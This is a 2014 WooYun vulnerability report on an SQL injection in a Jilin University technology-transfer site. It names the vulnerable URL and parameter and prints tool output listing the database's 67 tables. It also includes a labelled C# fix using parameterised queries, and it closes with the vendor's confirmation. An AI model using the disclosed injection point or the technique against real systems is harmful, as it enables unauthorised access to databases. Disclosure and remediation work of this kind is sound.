
Vulnerability summary

Defect ID: wooyun-2014-054911

Title: SQL injection vulnerability on a Jilin University sub-site

Vendor: jlu.edu.cn

Author: sex is not show

Submitted: 2014-03-31 11:19

Fix time: 2014-05-15 11:20

Disclosure time: 2014-05-15 11:20

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-03-31: Details reported to the vendor, awaiting vendor handling
2014-03-31: Vendor confirmed the report; details visible to the vendor only
2014-04-10: Details disclosed to core white hats and relevant domain experts
2014-04-20: Details disclosed to regular white hats
2014-04-30: Details disclosed to intern white hats
2014-05-15: Details disclosed to the public

Brief description:

SQL injection vulnerability

Detailed description:

Jilin University Patents and Achievement Transfer site: http://kjcg.jlu.edu.cn/
http://kjcg.jlu.edu.cn/pages/kjcgdt/read.aspx?id=7' -- a single quote appended to the id parameter immediately produces a raw database error

[screenshot: 1.jpg]


Tool run:

[screenshot: 1.jpg]


current database: 'projectex'

[screenshot: 1.jpg]


Database: projectex
[67 tables]
+----------------------------+
| dbo.Table1$ |
| dbo.[projectex.D99_CMD] |
| dbo.[projectex.D99_REG] |
| dbo.[projectex.D99_Tmp] |
| dbo.[projectex.dan_gege2] |
| dbo.[projectex.dan_gege] |
| dbo.[projectex.jiaozhu] |
| dbo.[projectex.kill_kk] |
| dbo.[projectex.t] |
| dbo.[projectex.t_jiaozhu] |
| dbo.[projectex.t_tian6] |
| dbo.[projectex.t_tian6_1] |
| dbo.[projectex.temp_tian6] |
| dbo.abilitytype |
| dbo.alliance |
| dbo.city |
| dbo.city1 |
| dbo.clzh |
| dbo.college |
| dbo.college_old |
| dbo.contract |
| dbo.contractstate |
| dbo.cooperation |
| dbo.corporation |
| dbo.division |
| dbo.domain |
| dbo.dqzc |
| dbo.dtproperties |
| dbo.e20090107 |
| dbo.exhibition |
| dbo.industry |
| dbo.inventor |
| dbo.inventorDeleted |
| dbo.kjcg |
| dbo.kjcgdt |
| dbo.kjdjxx |
| dbo.kjnl |
| dbo.links |
| dbo.member |
| dbo.notice |
| dbo.oaservice |
| dbo.oaservicetype |
| dbo.paper |
| dbo.patent |
| dbo.patent1 |
| dbo.patentDeleted |
| dbo.patentstate |
| dbo.position |
| dbo.priority |
| dbo.privilege |
| dbo.province |
| dbo.ptjs |
| dbo.qyxq |
| dbo.qyxqxx |
| dbo.rating |
| dbo.state |
| dbo.statistic |
| dbo.subject_code |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.systemconfig |
| dbo.title |
| dbo.transformtype |
| dbo.users |
| dbo.users_old |
| dbo.xzhxw |
| dbo.xzhxx |
+----------------------------+
There are clearly traces of a prior intrusion... dbo.[projectex.D99_CMD] |
Not going any deeper.

Proof of vulnerability:

[screenshot: 1.jpg]


current database: 'projectex'

[screenshot: 1.jpg]

Fix recommendation:

Filter the input.
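The report only says "filter", and the page does not show the site's own server-side code. The following is an added illustration (not code from the site or from the report's author) of how an ASP.NET handler behind a URL such as read.aspx?id=... is normally hardened against this class of bug: the id is validated as an integer and then bound as a typed SQL parameter instead of being concatenated into the query string. The table name dbo.kjcgdt appears in the report's table listing; the column names id and title, the class name and the method are assumptions made for the example.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web;

// Added example: a hardened read-by-id lookup for an ASP.NET page.
// Column names (id, title) are assumed; only the table dbo.kjcgdt is
// taken from the report's table listing.
public static class KjcgdtReader
{
    // Returns the title for the requested id, or null if no row matches.
    public static string ReadById(string connectionString, string rawId)
    {
        // 1. Validate the parameter against a strict whitelist: a positive
        //    integer. Anything else (including a stray quote) is rejected
        //    with a 400 before any SQL is built.
        if (!int.TryParse(rawId, out int id) || id <= 0)
        {
            throw new HttpException(400, "Invalid id");
        }

        // 2. Bind the value as a typed parameter. The text of the query is a
        //    constant, so user input can never change its structure. This is
        //    the pattern to use instead of "... WHERE id = " + rawId.
        const string sql = "SELECT title FROM dbo.kjcgdt WHERE id = @id";

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            return cmd.ExecuteScalar() as string;
        }
    }
}
```

Two further points follow from the report itself. The bug was found because a single quote produced a raw database error in the response, so custom error pages that hide exception text from clients remove the easiest confirmation signal. And the table listing shows the web application's database login could enumerate the whole projectex schema, including tables that look unrelated to the site; the login used by the application should be granted only the SELECT/INSERT/UPDATE rights it needs on its own tables, not ownership of the database.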

Copyright notice: when republishing, please credit the source: sex is not show@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed at: 2014-03-31 12:05

Vendor reply:

Thanks!! We will handle it as soon as possible!

Latest status:

None yet